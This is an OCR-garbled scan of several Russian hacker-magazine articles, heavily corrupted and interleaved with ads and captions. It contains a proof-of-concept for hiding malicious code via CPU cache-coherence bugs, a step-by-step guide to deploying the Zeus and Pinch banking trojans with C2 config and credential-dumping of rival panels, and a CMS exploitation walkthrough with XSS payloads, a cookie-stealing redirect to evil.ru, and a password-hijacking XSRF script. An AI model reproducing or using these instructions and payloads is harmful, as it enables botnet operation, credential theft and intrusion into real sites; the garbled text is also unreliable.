класс атак, официально обозначенный ІпіеГом как Сгозз-Мосіібуіпд Собе 
Вид или, сокращенно, ХМ С. 

Как известно, Репбит-процессоры используют раздельный кэш 
первого уровня. Один для кода, другой — для данных, причем, 
внутри кристалла реализован специальный механизм, отслеживаю- 
щий модификацию ячеек памяти, уже загруженных в кодовый кэш, и 
вызывающий его перезагрузку. Вплотьдо РепІіит-ІІІ (включитель- 
но) детект самомодифицирующего кода не представлял большой 
проблемы, поскольку кэш был устроен предельно просто. Но начи- 
ная с Репііит-4, кодовый кэш хранит не оригинальное содержимое 
оперативной памяти, а декодированные микроинструкции, — что су- 
щественно затрудняет проверку их принадлежности к модифициро- 
ванным ячейкам. Механизм распознавания самомодифицирующего 
кода резко усложнился, и в нем появилисьошибки. При определен- 
ных ситуациях (о которых мы еще поговорим) процессор продолжает 
исполнять старый код, игнорируя факт его модификации на другом 
ядре (реже — на том же самом). В результате, мы получаем в свое 
распоряжение превосходный антиотладочный прием, используемый 
еще во времена древних ХТ/АТ. При «живом» прогоне программы 
модификация идет лесом, то есть не воспринимается процессором, 
поскольку модифицируемые команды уже находятся на конвейере, а 
сбросить конвейер некому — детектор самомодифицирующего кода 
ловит муху. 

Вот отладчик — совсем другое дело. При пошаговойтрассировке между 
соседними командами процессор выполняет сотни и даже тысячи 
других команд, а потому самомодифицирующийся код исполняется как 
положено, без ошибок. Аналогично обстоят дела с дизассемблерами 
и эмуляторами, которые очень легко зациклить. В самом деле, пусть 
самомодифицирующийся код вырубает команду безусловного (услов- 
ного) перехода И : \шр И .тогда программа будет выполняться только 
на живом процессоре, но не под отладчиком. Это, разумеется, дебиль- 
ный прием, который нетрудно обнаружить, но, если модифицировать 
расшифровщик основного тела программы, ситуация окажется весьма 
неоднозначной. Чтобы разобраться, в каких случаях процессор игнори- 
рует модификацию кода, а в каких нет, уйдет туе ва хуча времени. 

Но это еще что! Существует возможность модифицировать код, загру- 
женный в кэш первого уровнята к, чтобы содержимое кэша данных 
первого уровня второго ядра осталось неизменным. Замечательное 
средство для обхода защит, контролирующих целостность кода. Пос- 
кольку напрямую прочитать содержимое кодового кэша невозможно, 
приходится довольствоваться содержимым кэша данных, надеясь на 
то, что процессор поддерживает их в согласованном состоянии. Ага, 




На центральныхулицах поразительно малолюдно 



разбежались! Дефекты кэш-контроллера ведут к нарушению когерент- 
ности и потому в кодовом кэше записано одно, а в кэше данных — совсем 
другое, причем модифицированные ячейки кэша данных вытесняются в 
кэш второго уровня (кодовый кэш не вытесняется никогда), а оттуда уже 
попадают в оперативную память. 

Комбинирование двух типов ошибок поддержки когерентности позво- 
ляет создать весьма устойчивый «голландский гибрид», переживающий 
вытеснение модифицированных ячеек из кэша данных в оперативную 
память. Алгоритм атаки выглядиттак: 

1. Ядро И модифицирует содержимое кэш-памяти первого уровня 02 
таким образом, чтобы ядро І_2 об этом ничего незнало. 

2 . Ядро І_1 передает на модифицированный код выполнение, загружая 
его в кодовый кэш С 1 , при этом кэш Ш находится в согласованном состо- 
янии с кэшем С1 . 

3. Ядро І_2 по-прежнему ничего не знаето факте модификации и потому 
попытка проверки целостности кода показывает, что все нормально. 
Лучшего способа для маскировки зловредного кода, пожалуй, и не при- 
думать. Воттолькоузлоумышленника нет никаких гарантий, что провер- 
ка будет выполняться именно на ядре І_2, а не И , поэтому необходимо 
предпринять дополнительные действия. 

4 . ОК, у нас имеется: модифицированный код и данные в С1 и ОІ.атакже 
немодифицированные данные в 02 — выполняя модификацию моди- 
фицированных ячеек памяти в 01 , хакер возвращает их в исходный вид. 
С1 об этом ничего не знает и не перезагружает кэш. А вот в кэш второго 
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Ночная Малайзия (вид из отеля Сгоѵѵп РІагА— именнотак, сударением 
на последний слог!) 



уровня будут вытеснены именно дважды модифицированные данные, 
то есть, фактически не модифицированные, стщательно вычищенными 
следами порчи. Какследствие, — факт вторжения становится очень 
трудно обнаружить! 

Естественно, после перезагрузки С1 кэша все придется начинать снача- 
ла. То есть, перехватить системную функцию получится только на очень 
короткое время, хотя и вполне достаточное для большинства задач, сто- 
ящих перед вирусами и червями. Ключевой фрагмент ргоо^-о^-сопсері 
ехрІоіЕа, демонстрирующий технику ХМС-атак приведен ниже, нуа над 
законченным оружием возмездия еще предстоит поработать. Кстати 
говоря, идея использоватьХМС-атаки для «ослепления» механизмов 
проверки целостности кода/данных возникла в ходе разговора с Алек- 
сандром Терешкиным — ведущим исследователем (ргіпсіраі гезеагсЬег] 
из фирмы ІпѵізіЫеТЬіпдз Ьаб. Да-да! Той самой, в которой трудится Жан- 
на Рутковская, поклявшаяся убить любого, кто снова спутает атаку на 
файл подкачки ѴѴіпсІоѵѵз с Голубой Пилюлей, последняя версия которой 
поддерживает вложенную виртуализацию (исправно работает под запу- 
щенным аппаратным эмулятором типа ХЕІМ’а, что делаетее обнаружение 
очень проблематичным, если вообще возможным]. Попутно — Жанна, 
которую все почему-то называют Джоанной, оказывается никакая не 
Жанна и не Джоанна, а Юанна. 



К сожалению, сама Юанна на конференции не обозначилась, и мы с 
Александром тусовались в «гордом одиночестве» на тридцатом этаже 
отела Сгоѵѵп Ріага Маіаузіа. Других русскоязычных хакеров на НІ ВТ 
замеченонебыло. И вот пока мыс ним так тусовались, к нам подходи- 
ли разные люди, чтобы обсудить проблемы виртуализации и атак на 
процессоры. Одним из них оказался Анатолий Зборальски, рабо- 
тающий в индонезийской конторе Веііиа Азіа РасіЕс. Идея обхода 
РаІхЕ СиагсГа посредством багистных процессоров — его. Нуа сейчас 
самое время продемонстрировать код, с помощью которого это 
можно сделать. Кстати, код тоже не мой и его происхождение весьма 
любопытно. Изначально он задумывался как головоломка в стиле: 
«угадай, что эта программа делает?», заброшенная на форум ѴѴАЗМ’а 
хакером РРОЕі (смотри пост ЬирѴ/ѵѵѵѵѵѵ.ѵѵазпп.гиЛогипп/ѵіеѵѵІоріс. 
рЕр?іс!=28983#8] . Однако, в результате неправильно выбранного сме- 
щения регистра Е5Р вместо того, чтобы затирать саму себя (как заду- 
мывалось], инструкция РОР перезаписывала команду, следующую за 
командой, вызывающей исключение. В итоге, на процессорах Іпіеі 
Соге2мыпоимелиХМС.Способ модификации команды может быть 
любым. Необязательно использовать именно РОР — МОѴ или 5Т05 
сработают ничуть не хуже. Исключение — необязательно нарушение 
доступа. Сгодится и «инвалидная команда» (скажем, 002]. Главное 
— чтобы модифицируемая команда располагалась после команды, 
вызывающей исключение, а модифицирующая команда находилась 
в пределах досягаемости конвейера и между ними отсутствовали 
ошибочно предсказанные ветвления, инструкции сериализации типа 
СР1Л0 и прочий зііЕЕ 

Ключевой фрагмент кода, демонстрирующий 

ХМС-атаку (только для 32-битных систем!) 



00403854 : 


ВС59384000 


шоѵ 


езр , 000403859 


00403859 : 


8Р442404 


рор 


й, [езр] [04] 


0040385Б: 


ЗЗСО 


хог 


еах , еах 


0040385Р: 


8В00 


тоѵ 


еах, [еах] 



При одновременном выполнении обозначенного кода на двух ядрах 
одно ядро «почувствует» модификацию, а другое — нет. Разумеется, при 
условии, что в процессоре присутствует неисправленный баг. Неболь- 
шое расследование показало, что среди мобильных ЦП багистные 
встречаются намного чаще, вто время как в последних партиях десктоп- 
ных процессоров ошибки уже исправлены, □□ 
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НАСТРОИТЬ? 



л ѵ/уЖмЙЮ 

Каждый день с задачами, решеш^^^торых н(^>зм<тно і» 

без использования троянов. Какой продукт выбрать? Стоит ли писать свой " 
ШЩ ШШ : ^шШкШЖЫ лШ. МШЖ: г мян 

собственный трой или обратить внимание на модификации уже существу- 



щих? Каком 
іЦ&і.ШЁШ 



илд 



ратить 

' ^нвр», 

ИТЬ^^^СИЛЫ, С Р 

асскажу о наиболее жвестных троих, их I 



именении.і 



ечь пойдет, прежде всего, отакихтроянах, как РіпсЬ и 2еи5. 
Во-первых, оба продукта широко известны, а во-вторых, 
найти рабочую версию в паблике/полупривате не соста- 
вит большого труда. Следовательно, можно опробовать 
полученные навыки на практике [естественно , на тренировочной 
машине , под ѴпМаге, — Прим. РогЬ]. Хочутебя предостеречь: в Сети 
валяется куча протрояненных билдов, так что будь осторожен и не сли- 
вай софт из сомнительных источников. 

Но — ближе к делу! Сначала давай подробнее познакомимся с 2еи5’ом, а 
затем кратко сравним его с Ріпсб’ем. 

И2ЕІІ5Ѵ5РШСН 

2еи5 состоит из двух основных частей: 

1. панельуправления — набор скриптов, включая админку, инсталлиру- 
емые на сервер; 

2. билдер — ѴѴіп32-конфигуратор бота. 

О панели управления мы поговорим позже, также, каки о конфигуриро- 
вании самого троя. Сейчас нас интересует перечень основных возмож- 
ностей продукта: 

• Отсутствие собственного процесса; какследствие, троянец невидим в 
списке процессов; 

• Обход большинства файрволов (в зависимости от версии); 



• Использование временных файлов с произвольным размером; 

• Работает в ограниченныхучетныхзаписях Винды (кроме Гостя); 

• Зашифрованноетело бота; 

• Блоки руетѴѴіпбоѵѵз Рігеѵѵаіі, что обеспечивает беспрепятственное 
получение входящих сообщений; 

• Все настрой ки/логи/команды бот хранит/при ни мает/передает по 
НТТРЗ-протоколу в зашифрованном виде; 

• Наличие отдельного файла конфигурации позволяет подстраховать 
себя от потери ботнета в случаи недоступности основного сервера; 

• Наличие резервных файлов конфигурации, используемых при отсутс- 
твии основного файла конфигурации; 

• Возможность работатьслюбыми браузерами/программами, работаю- 
щими через міпіпеС . сііі ( I пГегпеІ; Ехріогег, А01_, Махіюп ит.д.); 

• Перехват Р05Т-данных и перехват нажатых клавиш, включая данные 
из буфера обмена ; 

• Прозрачный ПВІ_-редиректна фейк-сайты с заданием простейших 
условий редиректа (СЕТ/РОЗТ-запросы, и т.д.) ; 

• Работа с веб-инжектами, которые позволяют подменять не только 
хтмл-страницы, но и любой другой тип данных. Подмена задается при 
помощи указания масок подмены; 

• Получение содержимого нужной страницы с исключением хтмл-тегов; 

• Настраиваемый ТАІЧ- граббер для любых стран; 
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ТЬіз аррІісаЬоп тйаіі ажІ сопБ^шгс у о «г 2еиЗ оп Йііз 
зегѵег. СЬоізе зеШг^з гпА ргезг 'ІпгГаІГ. 

в.ооі Ьаііг 
Ьо^и. [4- 10 скагз): 

Раззѵтогсі (6- 
64 сЬагз): 

МубОрС гегѵег: 

Нозі: 

ТІзег: 

Раззѵтагеі: 

І)аІаЬазе: 

МуЗСДЛаЫез: 

Изегз: 

ЗРЭСоипйу 

ЗЪайзЬса: зіаіз 

ТТзе<і ]р'д Сэг Зегѵісез: Ырер 
Воі соттапсіз: 
тазк: 

Ьо^з істріаісл 



ір2с 



фстсіе 



Яг.ОіГ'-, 



1тр8 

спз^ 



Инсталим админку 2еи5’а 

• Получение скриншота в области экрана, где была нажата 
левая кнопка мыши, после захода на нужный ІІНІ_; 

• Получение любых импортируемых сертификатов и их 
сохранение на сервере; 

• Перехватлогинов/паролей по протоколам РОРЗ и РТР в 
независимости от порта, и запись в логтолько при удачной 
авторизации; 

• Поиск на логических дисках файлов по маске и/или за- 
грузка конкретного файла; 

• Получение скриншота с компьютера жертвы в реальном 
времени (компьютер должен находиться вне ЫАТ); 

Как видишь, троян обладает феноменальными способнос- 
тями :). Теперь посмотрим на Ріпсб: 

РіпсЬ состоит изтрех частей: 

1. панельуправления — набор скриптов, включая админку, 
инсталлируемых на сервер; 

2. билдер -ѴѴіп32-конфигуратор трояна; 

3. парсерлогов— ^пила для расшифровки и парсинга логовтроя. 
Среди основных возможностей продукта — перехватло- 
гинов/паролей по протоколам РОРЗ/РТР, а также граббинг 
сохраненных данных из ІЕ. 

Описывать функциональную часть пинча я не буду, это уже 
сделали за меня. Скажу лишь, что оба трояна отличаются 
целью применения. 2еи5 предназначен, прежде всего, для 
построения долгосрочных ботнетов. Тебе обязательно пот- 
ребуется абузоустойчивый сервер для управления ботнетом 
и хранения логов. Ріпсбже, какправило, используют для 
нанесения «точечныхударов» (протроянивание конкретного 
человека с целью получения конкретной информации]. В 
этом случае гораздо удобнее и безопаснее заливать админку 
на ломаный шелл, с последующим удалением оной. 



г НАСТРОЙКА И КОНФИГУРАЦИЯ ТРОЕВ 

С РіпсЬ’ем все просто. 

1. Уста на вливаем логин/пароль в файле іііеіізк .рЬр: 



$1одіп= ' хакер ' ; 
$раззтлгогс1= ' ЫаЫа ' ; 



2. В файле айшіп.рЬр устанавливаем режим ведения 
логов: 



І_одІп: 

Разеюогсі: 

Епіег 



Неприступная панелька РіпсЬ’а 



$тос1е = 2; //Сохраняем на сервере 

3. Заливаем файлы асітіп.ріір, ТіІеІізС .рЪр и ката- 
лог /герз наудаленный сервер. 

4. Устанавливаем права 777 на каталог /герз. 

5. Пожеланию прописываем и добавляем . Ькассезз (в 
целях безопасности]. 

6. Запускаем билдер, указываем хост и полный путь до 
абтіп.рбр относительно веб-каталога. Например: 

хост — 127 .0.0.1 
путь — /ітд/асітіп . ркр 

7. Получаем готовый ехе'шник, который криптуем по своему 
усмотрению. 

Послетого, кактрой разослан, необходимо пристально сле- 
дить за админкой — в скором временитам появятся логи, 
которыеты сможешь скачать и просмотреть при помощи 
Рагзег’а. 

Авотс2еІІ5’ом все несколько сложнее. 

1. Заливаем панельку на сервер, после чего устанавлива- 
ем ее: 

ІЩЦр : //127 .0.0. 1/отеЪ/ . іпзкаіі/іпсіех . ркр 

2. По ходу инсталляции тебе необходимо указать следующие 
данные: 

• Рооі Іодіп: логин/пасс для админки ботнета; 

• Му5СИ_зегѵег: данные для Му5С11_ (пользователь уже 
должен существовать, но если указанная БД не существует, 
то она будет создана автоматически); 

• МуБОНаЫез: названия таблиц в БД (следует изменить в 
качестве маскировки]; 

• І_осаІ раІЬз: локальные пути на сервере относительно 
директории установки. 

3. Выбираем способ хранения логов (БД или в файлах] и 
указываем тайм-аут для ботов. 

4. Ставим права 777 на каталог /зузСет и завершаем 
установку. 

5. После создания вложенного каталога / . іііез необхо- 
димо запретить выполнение скриптов из этого каталога с 
помощью .ЫассезБ следующего содержания: 

КетоѵеТуре рЬр 
р1тр_11ад епдіпе 0 
рЬр_11ад епдіпе 0 

По Сети давно гуляет сплойт, с помощью которого можно 
без труда залить шелл на твой сервер и завладеть ботнетом, 
если ты отнесешься невнимательно к этой превентивной 
мере безопасности. 

6. Запускаем билдер (по дефолту — «/1оса1/ср. ехе»]. 
Т.Указываем файл конфигурации и жмем «Есііісопіід», после 




> ѵѵагпіпд 

Внимание! Инфор- 
мация представлена 
исключительно с 
целью ознакомления! 
Ни автор, ни редак- 
ция за твои действия 
ответственности не 
несут! 




> і пГо 

• При установке 
админки в 2еи5 не 
забывай об обяза- 
тельном запрете на 
выполнение скриптов 
в каталоге / . іііез, 
иначе ботнета не 
видать, как своих 
ушей. 

• Стандартная ад- 
минка 2еи5’а имеет 
несколько вкусных 
зці-инъекций. Поко- 
павшись в Сети либо 
в самой админке, 
можно без труда 
найти их. 

• При выборе трояна 
руководствуйся пос- 
тавленной задачей. 
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Парсер для РіпсЬ’аІ 



іфигурируем будущего бота. 
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5у$1ет Іпто - Пользователь 



Имя компьютер* 71СВ7Р41542Ѳ45Е 
хост 71С87Р41342М5Е 
40 0291600077720571 
Страна: Реодо верим* от сипа 
Язь* СПіпезе 

Разрешение экрана 1074*768*32 
Время 30 08 2005 6' 19 40 



ІпѵЧгібЫтаг* I ура 
П«ѵм 

Слив» щма/ее® 



♦ ІА «45 

♦ іа ^нкхИкиді 

♦ ІА Ч5Н мм-.глэгт 



I - 



мим 
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Раш: 
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5иЬ|ес1: 



Рііе пате 
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• Многопользовательский режим; каждому пользователю 
можно задать определенные права доступа 

• Статистика установок (инсталлов, заражений) 

• Статистика ботов , находящихся онлайн 

• Разделение ботнета на саб-ботнеты 

• Обзор онлайновых ботов (в том числе и по фильтру) 

• Просмотр скриншота в реальном времени 

• Просмотр и проверка Зоск4 

• Время нахождения бота в онлайне 

• Скорость соединения (только для ботов вне ЫАТ) 

• Хранение логов в базе данных (дает следующие преиму- 
щества: поиск логов по фильтру содержимого; поиск логов 
по шаблонам с выделением нужных РОЗТ- данных) 

• Хранение логов в зашифрованных файлах, в структуре ди- 
ректорий ботнет\страна\ІБ компьютера 

• Отдача команд ботам (в том числе и по фильтру) 

• Возможность собственноручного модифицирования админки 

Как видишь, опций более чем достаточно. Но в каждой бочке меда есть 
ложка дегтя. В случае с 2еи5’ом — это напрочь бажная и дырявая админ- 
ка, в которой неоднократно находили зці-инъекции. Крометого, я уже 
говорил об обязательном запрете на выполнение скриптов в каталоге 
/Тііез. Соответствующий сплойтты без труда найдешь на просторах 
Сети. Использовать его довольно просто, достаточно лишь передать 
скрипту необходимые параметры: 



ВиіІсІ | Ехй | АЬоіЛ 



НОЗТ: 127 .0.0.1 
РОЬБЕК: ѵ7еЪ/ 



Билдим трой 



Послезапуска сплойтвыдастнам следующие данные: 



Следует обратить внимание на такие пункты, как: 

епбгу " ЗкабісСопіід" 

;Ьобпеб "ЬобпеШ"; здесь указываем имя ботнета , в 
нашем случае — Ьобпебі 
бішег_сопбід 60 1 
бітег_1одз 1 1 
кітег_зкабз 201 

иг1_сопбід "Ьббр : / /шу_зегѵег/ѵ^еЬ/сРд . Ып" ; здесь 
указываем местонахождение основного конфига, в нашем 
случае — ТШбр: //ту_зегѵег/ѵ\геЬ/сід . Мп 

иг1_сошрір "Ькбр : / /ѵбіабізтуір . сот/ " 2 56; сайт, на 
котором можно проверить свой ІР, нужен для определения 
ЫАТ 

; Ыаск1ізб_1апдиадез 1049 

епб 

епкгу "ВупатісСопіід" 

иг1_1оабег "Ьккр : / /ту_зегѵег/ілеЬ/1бг . ехе" ; ука- 
зываем адрес , по которому можно скачать апдейт бота 

иг1_зегѵег "ЬбЬр| / /ту_зегѵег/ѵ^еЬ/з .рЬр" ; наш сер- 
вер, на который будут отправляться логи и файлы с ботов 

бі1е_ѵ\геЫпзесбз "ѵ/еЪііто еебз . бхб»; файл со списком 
веб-инжектов 
епбгу " АбѵапсебСопіідз " 

"Ьббр: //гезегѵе_зегѵег1/2еиз/сРд.Ьіп" ; в этом 
разделе указываем адреса, с которых можно скачать резер- 
вный конфиг 
епб 



аггау(8) { [ 0 ] => збгіпд ( 1 ) "1" [ " іб" ] => збгіпд ( 1 ) "1" 

[ 1 ] => збгіпд ( 4 ) "гооб" [ " Іодіп" ] => збгіпд ( 4 ) "гооб" 

[2 ] => збгіпд ( 6 ) "б00г" [ "разз " ] => збгіпд ( 6 ) "б00г" [3]=> 
збгіпд(ІО) "8194967292" [ "ргіѵ" ] => збгіпд (10) "8194967292" 
} аггау(8) { [0] => збгіпд (1) "2" [ "іб" ] => збгіпд (1) "2" 

[1] => збгіпд (9) "абшіп" [ " Іодіп" ] => збгіпд ( 9) 

"абшіп" [2 ] => збгіпд ( 6) "12345098" [ "разз " ] => збгіпд ( 6 ) 
"12345098" [3 ] => збгіпд (7) "3097136" ["ргіѵ"]=> 
збгіпд(7) "3097136" } аггау(8) { [ 0 ] => збгіпд ( 1 ) "4" 

[ " іб" ] => збгіпд ( 1 ) "4" [ 1 ] => збгіпд ( 7 ) "ЬоЪ" ["1одіп"]=> 
збгіпд(7) "ЬоЬ" [2 ] => збгіпд ( 6) "ЪоЪуЪоу" ["разз"]=> 
збгіпд ( 6 ) "ЬоЬуЬоу " [3 ] => збгіпд ( 6 ) "468872" 

[ "ргіѵ" ] => збгіпд ( 6 ) "468872" ІМУЗОЬНОЗТ: ІосаІЬозб 
МУ50ШЗЕК. : геиз МУЗОЬРАЗЗ : дгаЬ_разз 

Отсюда получаем: 

1. Аккаунты к админке: 

гооб — логин 
боог — пароль 
абшіп — логин 
12345098 — пароль 
ЬоЬ — логин 
ЬоЬуЬоу — пароль 

2. Аккаунт к СУБД: 

логин: зеиз 
пароль: дгаЬ_разз 



8. Билдим бота и криптуем его по собственномуусмотрению. 

Теперь немного о панели управления ака админка. В отличие от при- 
митивной пинчевой панельки, мощная админка зеуса обладаеттакими 
функциями, как: 



Сам понимаешь, получить доступ ктвоему ботнету не составит особо го труда. 
В любом случае, выбиратьтебе, а я лишьописал два наиболее извест- 
ных и распространенныхтрояна, существование которых ни для кого не 
является секретом :). НЕ 
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Компьютеры ІІ5Ы ЫЕОЫ 
на базе процессоров 

Іпіеі® Соге™ 2 Оиаа 

: 1 III 1 

(495)727-33-55 



Сеіетоп, Сеіетсп Іпзіде, Сепігіпо, Сепігіпо Іодо Сйге ІПвйе, Іпі-е!, ІггіеІ Іодо, Іпіек Согв, ІпіеІ Іпзігі-е, ЫеІ Іпэісіе Іодо, Іп(еі Ѵііѵ, ІпюІ ѵРго, 
Нэпіит, ІІапіінП Іп&ійе Рѳпііит, Рѳпііигп іпбійв. Хѳрп л Хеоп Іпзійе яжіягатся товарными знаками права на которые принадлежат 
корпорации ІпіеІ на территории США и других стран 
Нэ правах рекламы- Товар сертифицирован 



и 

ѵѵѵт.Н-тепи 
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» 




ЗН2КЕВВ 




НЕЗАВИСИМЫМ АУДИТ КРУПНОГО 



Сегодня я расскажу тебе одного довольно популяр- 

ного ѵѵеЪ -движка для пост роения сайтов КипСМЗ . Мне удалось найти в нем 
кучу недокументированнь ^^^^^^^^^^^^шш зсь с банального аудита, 
который, на первый взгляд, отнюдь не сулил крупного урожая. 



статье я постараюсь не просто поведать про найденные 
баги, но и показать, как их можно реально эксплуатировать. 
Я покажу, как повысить свои права от постороннего пользо- 
вателя до заливки шелла в админку и получения доступа к 
командной строке сервера. Найдя однууязвимость, мы не остановимся, 
атутже пытаемся найти другие способы получения доступа. 

Такой подход обусловлен тем, что в реальныхтестах на проникновение и 
анализуязвимостей требуется нетолько «сломать» систему, но и обнару- 
жить, в идеале, если не все, то большинство возможныхуязвимостей, не 
ограничиваясь просто получением доступа к ней. Так можно произвести 
наиболее полную оценку защищенности системы. 

Н ПОВЕРХНОСТНЫЙ ВЗГЛЯД. ПЕРВЫЕ УЯЗВИМОСТИ 

Бегло осмотрев движок и попробовав основные проверки, я нашел 
первую багу — ЫпкебХ55 в ІІКБ-строке. Запрос выглядел так: 

ТШСр : //1оса1ЪозД/то<іи1ез/печл7з/іпсІех.рЪ.р/ 

" ><зсгірр>а1егр ( 1 Х88 ' ) </зсгірР> 

Что нам это может дать, надеюсь, понятно, и вдаваться в подробности 
не будем. Естественно, что одной Х55 нам недостаточно, поэтому ищем 
дальше — переходим в раздел редактирования пользователя и пытаем- 
ся загрузить аватару, но не простую, а сюрпризом. 

В аватаре будет за писан іаѵазсгірі:- код, который выполнится в браузере, если 
обратиться напрямую кзалитой на сервер картинке. Так мы и поступим. 



Подробнее о внедрении ]аѵазсгір1:-кода в изображения и обходе фильт- 
ров читай в моей статье [ бирѴ/ѵѵѵѵѵѵ.бзес.ги/аЬоЩ/агЦсІез/ѵѵеЬ хзз ]. 

В результате, мы получим все ту же, опять-таки, Х55, для исполь- 
зования которой нам необходимо, чтобы пользователь перешел 
по ссылке. Правда, ссылка на этот раз будет не такая подозри- 
тельная, как в случае предыдущей Х55. Выглядеть она будет, как 
настоящая ссылка на картинку. Теперь мы можем отправить жерт- 
ве ссылку, с заманчивым описанием — и при нажатии на которую 
его соокіез будуту нас. Это все, конечно, интересно, но хочется 
чего-нибудь стоящего и независимого от пользователя, поэтому 
продолжаем копать. 

^ ПЕРВЫЕ ТРУДНОСТИ 

Опытным путем было обнаружено, что в разделе добавления новостей по 
адресу шоОиІез/пеѵ^з/зиЬшіс .рЬр не фильтруется название новости 
— переменная «зі^есі» 

Таким образом, если занести вместо названия новости всеми любимую 
строку <зсгірС>а1егС ( "ХЗЗ" ) </зсгірС>, то она внедрится в стра- 
ницу. Причем, не в какую-нибудь, а заглавную, таккакна ней высвечива- 
ются заголовки последних новостей. Это дастнам шанс перехватывать 
соокіез или выполнить любой ]аѵазсгір1:-код отимени пользователя, 
зашедшего на главную страницу. 

Нотут нас ждет небольшой сюрприз. Дело втом, что переменная, в 
которой хранится название новости, ограничена 62 символами, что 
оченьсильнозатрудняетвнедрение практически любого полезного нам 
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Сессии пользователей, хранящиеся в базе 

ІаѵазсгірІ-кода. К примеру, чтобы вставить ссылку на соокіе-снифер, нам 
необходимо внедрить примерно следующий код: 

<зсгірк>с!оситепк . 1осакіоп= "Ьккр : //еѵіі .ги/1 . 
рЬр? " +сіоситепк . соокіе</зсгірк> 

Размерэтого кода — 74символа, что уже превышает рамки. Конечно, 
если постараться, то можно немного сократить, но очень маловероятно, 
что его получится уместить в 62 символа (а если и выйдет, то эксплуата- 
ция будет слишком заметна, так какпри заходе на сайт пользователем 
процедура Ьосшпепк . Іосакіоп перебрасываетего на наш сервер 
— весьма подозрительно, согласись). Итак, у нас появилисьдве допол- 
нительные задачи: как нам поместитщаѵазсгірЬкод в ограниченное 
поле и как нам незаметноукрастьсоокіе или выполнитьлюбой запрос от 
имени пользователя. 

Немного отвлечемся отэтой уязвимости и посмотрим на страницу смены 
пароля в профиле пользователя. Можно заметить, что скрипт нетребует 
знания старого пароля, а значит, злоумышленник, получивший доступ 
к профилю пользователя, можетсменить пароль, и ничего ему не поме- 
шает. На самом деле, это может сделать нетолько злоумышленник, но 
и сам пользователь, не осознавая этого — если ему подсунуть страницу, 
которая будет слать Р05Т-запрос, меняющий пароль на сервер. Эта 
уязвимость называется Сгозз 5ке Нецііезі: Рогдегу или ХЗРР. 

Теперь вернемся кнашей прошлой уязвимости и объединим их. Попробу- 
ем встроить на сайт)аѵазсгір1:-код помощи Х55, который, используя Х5ПР, 
будет менять пароль каждому зашедшему пользователю. Идея, конечно, 
великолепная, но какже мы будем обходить ограничение поля зи^есі: в 62 
символа? Нам повезло, — движок имеет возможность заливки файлов на 
сервер. Какя писал выше, можно загружать картинки щаѵазсгірЬкодом. 
На самом деле, мы можем заливать нетолько картинки, но и любые файлы 
с разрешенным движком расширением, и их содержимое не будет про- 
веряться. Воспользуемся же этим, и загрузим на сервер файл щаѵазсгірі:- 
кодом, который, используя АІАХ-технологию, посылает на сервер запрос, 
меняющий парольтекущему пользователю и делающий это незаметно для 
юзера. В нашем файле будет находиться следующий код: 

ѵаг оЬ^НТТР = пем АскіѵеХСВД еск ( 'М5ХМЬ2 .ХМЬНТТР' ) ; 
ѵаг ісі = Ьосшпепк . соокіе . зиЪзкг ( 

Ьоситепк . соокіе . зеагсЪ. ( " гс_зезз " ) + 31); 
оЬ ^ НТТР . ореп ( ' Р08Т ' , 

"Ьккр: //192 . 168 . 40 . 26/гипстз_1 . 6 /есіікизег . ркр " , каізе) ; 
оЬ^НТТР . зекКедиезкНеасіег ( ' Сопкепк-Туре ' , 

' арріісакіоп/х-ілплм-когт-игіепсосіесі ' ) ; 
оЬ^НТТР . зепсі ( " ешаі1=оѵтес1%40ЬаскЪох . сош&иразз=12345&ѵр 
азз = 12345&изесоокіе=0&иіс1= " + ісі + " &ор=заѵеизег " ) ; 

В двух словах: мы создаем АсбѵеХ- компонент М5ХМІ_2.ХМІ_НТТР, с 
помощью которого можно посылать произвольныезапросы на сервер. 

В нашем случае отправляется запрос на страницу редактирования 
пользователя [ 192. 168.40. 26/гипстз 1 .б/есІкизег.рЬ ), который меняет 
пароль пользователя и его почтовый ящик на «12345» и оѵѵпесШЬаскбох. 




Соокіез пользователя после ІЭВІ_-декодирования 

сот, соответственно. В случае если бы мы посылали запросы на сто- 
ронний сервер (к примеру, чтобы отсылать себе соокіе пользователя), 
браузер выкидывал бы предупреждение, что небезопасный компонент 
пытается инициализировать соединение на сторонний сервер. Номы 
отправляем запрос на тотже сервер, так что со стороны браузера все 
легально, и предупреждений не будет. Теперь сохраним этотскрипт в 
файл, назовем его гіо.іір, а затем загрузим файл на сервер. 

Первая часть работы сделана, осталось выяснить, куда сохраняется наш 
файл и каквыполнить код, находящийся в нем. 

Поумолчанию все загруженные файлы помещаются в папку /шосіиіез/ 
тусіошіІоасіз/сасЬе/кіІез/. Теперь нужно каким-нибудь образом 
подгрузить файл, используя нашу Х55-уязвимость в заголовке новостей. 
Для этого необходимо создать новость, у которой в поле зибіесі: будет 
следующий код, занимающий всего 58 символов: 

<зсгірк згс= " . . /шусіоѵтІоасіз/сасЬе/кіІез/гІо . 2 Ір"></ 
зсгірк> 

Этой строкой мы подгружаем на страницу залитый нами файл и интерпре- 
тируем его ка^аѵазсгірЬкод. Такмы обошли ограничение на длину строки. 
Этим способом можно пользоваться везде, где есть возможностьзакачать 
на сервер свой файл, в котором не проверяется содержимое на наличие 
Ыті-тэгов. Кпримеру, для этого можно использовать изображения, нотам 
свои нюансы, которыеты можешь изучить самостоятельно. 

В итоге, после создания нашей новости с внедренным в заголовок кодом 
у каждого посетителя, зашедшего на главную страницу, будет автома- 
тически меняться пароль. При желании это можно заменить на любую 
другую функцию. Таким образом, наткнувшись на препятствие, не стоит 
отчаиваться — всегда надо искать альтернативные пути, тем более что 
зачастую получается еще лучше, чем рассчитывал. 

Н ИНЪЕКТИМ ВСЛЕПУЮ 

Найденными уязвимостями мы не ограничимся и посмотрим, что же еще 
приготовил нам этотдвижок. Если обратиться к странице загрузки фай- 
лов, то можно заметить интересную картину. При обращении по ссылке: 

Ъ.ккр: // [зегѵег] / [іпзкаіісііг] /шосіиіез /ту сіоѵтіоасіз/ 
Ьгокепкііе . ркр?1ісі=1 

нам предлагается скачать файл (что и следовало ожидать). Однако если 
мы запросим страницу 

Ъ.ккр: // [зегѵег] / [іпзкаіісііг] /шосіиіез /ту сіоѵтіоасіз/ 
Ьгокепкііе . рЬр?1іс1=1+апсі+1 = 1 

то в результате получим, как и в предыдущем варианте, предложение 
скачатьфайл. Что самое любопытное, следующий запрос выдал нам 
ошибку. 
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Результат работы скрипта в обход системы обнаружения 

ЬССр : // [зегѵег] / [іпзСаІІсІіг] /тосІиІез/туЛоѵтІоасІз/ 
Ъгокепіііе . ркр?1ісІ=1+апс[+1=2 

Все это говорит о том, мы обнаружили 501- инъекцию, а точнее, 
